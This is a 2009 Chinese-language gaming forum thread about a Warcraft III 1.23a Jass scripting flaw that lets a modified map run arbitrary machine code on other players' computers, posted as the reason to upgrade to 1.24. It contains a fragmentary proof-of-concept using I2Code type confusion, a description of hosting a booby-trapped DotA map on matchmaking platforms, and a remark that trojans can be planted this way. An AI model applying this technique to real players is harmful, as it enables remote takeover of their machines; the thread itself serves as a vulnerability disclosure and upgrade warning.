IPvE vLan 遊戲平台|網吧系統 - Powered by Discuz! Board

標題: 只此一次 Warcraft III 1.23a 漏洞 / 升級1.24 主因 [打印本頁]

作者: 骨精 時間: 2009-9-3 23:12 標題: 只此一次 Warcraft III 1.23a 漏洞 / 升級1.24 主因

War3 Jass虛擬機經測試，存在嚴重漏洞！允許運行時動態創建並執行任意機器碼

Jass屬於War3為地圖開發者提供的一套腳本語言，方便開發者開發或建立修改屬於自己的地圖。
經過推斷，CS (cstrike)可能也存在此類問題。

利用方式：登陸浩方或者VS對戰平台，修改某張地圖(例如DOTA的地圖)，開啟游戲，等待其他玩家進入，開始游戲，即可執行任意機器碼，控制玩家計算機。

Jass語言的用處
Jass(正確地說是Jass2)是魔獸3的腳本語言, 用於控制地圖的進程和行為, 是魔獸游戲和地圖的基礎. 正常的地圖編輯中擺放的單位(Unit),設置的觸發(Trigger)等最終都會被翻譯成Jass語言存在地圖文件裏在游戲時被調用.

POC:
複製內容到剪貼板
代碼:
set bj_meleeTwinkedHeroes[1024] = 0x90909090 set bj_meleeTwinkedHeroes[1025] = 0x90909090 //and other bytecode giberish. ... local code C = I2Code( code2I(function GetRandomDirectionDeg) + 0xC92D8 ) call TriggerAddAction(t, C) call TriggerExecute(t) //It will run whatever bytecode 90 90 90 90 means function main takes nothing returns nothing set t = CreateTrigger() call TriggerAddAction(t, i2code(0x00929217) ) a[0]=0x45623512 a[1]=0x34562323 a[2]=0x62329301 ... //other thousand lines of this ... b[0]=0x12312333 endfunction

[ 本帖最後由骨精於 2009-9-3 23:27 編輯 ]

作者: 雪光星漾 時間: 2009-9-3 23:13

而家1.24緊

作者: 骨精 時間: 2009-9-3 23:22

引用:

原帖由 雪光星漾 於 2009-9-3 23:13 發表
而家1.24緊

開post係唔想d小朋友當vlan無理升1.24 累到佢地玩唔到優信姐

作者: 雪光星漾 時間: 2009-9-3 23:25

改標題名做升1.24原因應該好d

作者: 骨精 時間: 2009-9-3 23:56

引用:

原帖由 雪光星漾 於 2009-9-3 23:25 發表
改標題名做升1.24原因應該好d

已改

作者: 29wing 時間: 2009-9-4 05:26

我怕佢地睇唔明 =.=

作者: 骨精 時間: 2009-9-4 14:12

引用:

原帖由 29wing 於 2009-9-4 05:26 發表
我怕佢地睇唔明 =.=

可以直接利用地圖植入木馬無需加殼

歡迎光臨 IPvE vLan 遊戲平台|網吧系統 (https://www.ipve.com/bbs/)